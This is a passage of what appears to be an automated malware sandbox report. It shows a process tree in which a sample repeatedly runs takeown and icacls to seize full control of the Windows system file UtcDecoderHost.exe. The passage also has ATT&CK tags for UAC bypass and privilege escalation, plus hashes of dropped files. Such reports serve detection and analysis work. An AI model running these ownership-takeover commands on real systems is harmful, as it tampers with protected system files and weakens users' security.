C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3896
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:4496
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5936
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5516
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5780 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5188
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5688
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3184 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3496
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5144
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1196
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:1088
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5836
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5184
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:3652
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5540
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:3400
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5656
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5792
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5524
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:3096
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5856
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:2788
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4380
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5828
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5968
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5352
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:436
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:744
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:3204
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:6000
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:5452
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5124
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5980
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:1624
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4468
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3176
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5712
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6020
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:1012
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5744
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5920
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2524
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:6108
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3132
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:3252
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3140
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5764
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5448
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:4228
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5596
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:2380
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4108
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:4248
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5444
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4428
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5200 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3812
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5012
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2056
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:1736
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3540
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5932
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:6072
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv ppQx/VIl0keqW2GSJ5P1sA.0.21⤵PID:1132
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:3560
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Event Triggered Execution
1Change Default File Association
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
550KB
MD5ddbb452b49482a93a7733037deeda688
SHA1aae9eb5670bad8fbaded7624ec3d687222310f1d
SHA256b083810810576a32ed16002acc3db505a75148d65783e2462e734b29a2710643
SHA51284343374d9b27468b9e9ba40df81ba0a95fe676c03a62877c327e265ed19520f4e4ce147742b06b3eb83e02436e7758ffd6f53b311dffdcec39bba50f70ebc2d
-
Filesize
448KB
MD589924677e9bfd8083448419a882950c6
SHA183a560187d24457003403a70b133906dd2169cd4
SHA2567c41eabecc24e523c471266cdb14a96631f0e1836a53f29e5b59d9a4b7a0e3b9
SHA51284b68a9ba11a6b39fff6d654f09e17ff72f7115605863475880ffd777aceacb2149c2f9b0254b14f2450c837ad33513d91106663def4990acee314691be9b5c9
-
Filesize
550KB
MD591e8d5f50550eb09155f5826fcd8c3bb
SHA150cec13ae8ad8f2e284d77ddb697da536ce57168
SHA256fb3ae4f7dff787ca34db08a35df7422f27eef737e1345f98f35966bb35efea3b
SHA51299c3c7dcc1acf7fb809f7042cce9c9c3570d1b7242d57f6b3fdd66552c7d8a55878d98cbcb0fbc63b6d6651511ba105e4590b2891dd1ecb7686715df06a07caf
-
Filesize
550KB
MD53b47000619b1639286ba920ab520bc50
SHA16789bbd7e89ccf7b38413445b4d21c7d1ee2ce0c
SHA2562f91e120416029ce039622a55e7093faea2d1a60f5f9b3ec88daeefbbb6d5b8b
SHA512c2757193af8963916c67bdcf60ed8988c7b53a1f3222e2d3580fdab9c83538a905b730c15a5ee28f845fccf4dda896fc0a6f336d88a66991e52e2937a406e34f
-
Filesize
550KB
MD5eb000f34b52e3f4835d574f51f9151e6
SHA1fcbef0a4f6c3ddd2828c9b040d3901e47d5c7756
SHA256cf76d9f7ecdad54c837aea4b85fa6b22a7302ae8a5f5b69662e4454d82010963
SHA51206af9ee81e6cd7548c2102bd004a7a081a177a275a811b700e97ec1fdf094f7d81c3b1aa77b8fe77e6803589d1fac443cd18a4d6ca4311ee6684acff430d3ea2